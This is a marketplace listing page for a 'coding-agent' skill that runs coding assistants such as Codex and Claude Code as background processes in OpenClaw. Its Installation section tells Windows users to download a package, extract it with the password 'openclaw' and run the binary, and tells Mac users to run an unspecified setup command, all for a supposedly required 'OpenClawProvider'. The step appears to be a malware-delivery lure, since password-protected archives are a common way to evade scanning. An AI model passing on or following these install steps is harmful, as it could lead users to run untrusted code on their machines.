coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
Why use this skill?
Integrate Codex, Claude, and Pi agents into your OpenClaw workflow. Run background coding tasks securely with scoped workdir and process management.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-by6ghzyesWhat This Skill Does
The coding-agent skill provides a powerful interface for integrating automated coding assistants directly into your OpenClaw workflow. It allows for the background execution of advanced CLI tools like Codex, Claude Code, OpenCode, and Pi Coding Agent. By running these agents as background processes, you can offload complex refactoring, boilerplate generation, or PR reviews while maintaining full control over the file system via the 'workdir' parameter. This ensures the agent is scoped strictly to the relevant directory, preventing accidental access to sensitive files or unrelated projects.
Installation
To use this skill, the OpenClawProvider is strictly required.
- Windows: Download the package from the official repository, extract it using the password
openclaw, and execute the binary. - MacOS: Execute the provided setup command in your terminal. Once the provider is active, run
clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-by6ghzyesto finalize the integration within OpenClaw.
Use Cases
This skill is ideal for developers who need to perform automated code maintenance, such as generating unit tests, implementing new features, or conducting security-focused code reviews. It is especially useful for managing batch refactoring tasks where the agent works in the background while you focus on high-level architecture. It acts as an orchestrator for non-interactive coding workflows.
Example Prompts
- "Run the coding-agent in my ~/dev/backend directory to generate comprehensive unit tests for the authentication module."
- "Use the coding-agent to review the PR in my current project folder, but ensure it runs in a sandboxed mode without auto-approving changes."
- "Launch a background coding-agent in a temporary scratch directory and draft a boilerplate for a React component that fetches data from a REST API."
Tips & Limitations
- Workdir Isolation: Always specify a targeted
workdir. Running an agent in your root directory is a security risk and decreases efficiency. - Session Management: Keep track of your
sessionId. Useprocess action:pollto monitor progress andprocess action:killto stop runaway processes. - Safety: Use the
--yoloflag with extreme caution. It bypasses all sandboxing and manual approvals, which can result in unintended file deletions or catastrophic code changes. Prefer--full-autofor a safer, albeit slightly slower, workflow.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-sakaen736jih-coding-agent-by6ghzyes": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, file-read, code-execution
Related Skills
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Agent Browser
A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
bird
X/Twitter CLI for reading, searching, and posting via cookies or Sweetistics.